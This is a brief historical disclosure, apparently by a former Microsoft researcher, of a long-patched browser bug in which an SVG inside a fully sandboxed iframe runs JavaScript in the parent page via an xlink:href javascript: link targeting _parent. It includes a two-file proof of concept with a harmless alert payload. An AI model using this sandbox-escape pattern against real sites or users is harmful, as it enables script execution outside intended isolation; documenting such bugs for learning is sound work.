I was lucky to find this one. A fully sandboxed iframe — no flags at all — could execute JavaScript in the parent window simply by embedding an SVG file with a javascript: xlink targeting _parent. Clicking the link ran arbitrary code in the parent’s context with no restrictions.
```html
<!-- index.html -->
<iframe sandbox src="sandboxed.svg"></iframe>
```

```html
<!-- sandboxed.svg -->
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
  <a xlink:href="javascript:alert(document.body.innerText)" target="_parent">
    <text x="60" y="50" fill="blue">I'm fully SandBoxed, but CLICK ME ...</text>
  </a>
</svg>
```
The sandbox was correctly applied to the iframe, but SVG’s xlink:href with a javascript: URI and target="_parent" was not being blocked. When the user clicked the link, the JavaScript ran in the parent frame’s context, completely outside the sandbox. A variation using an HTML file with a JavaScript link was filed separately.
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.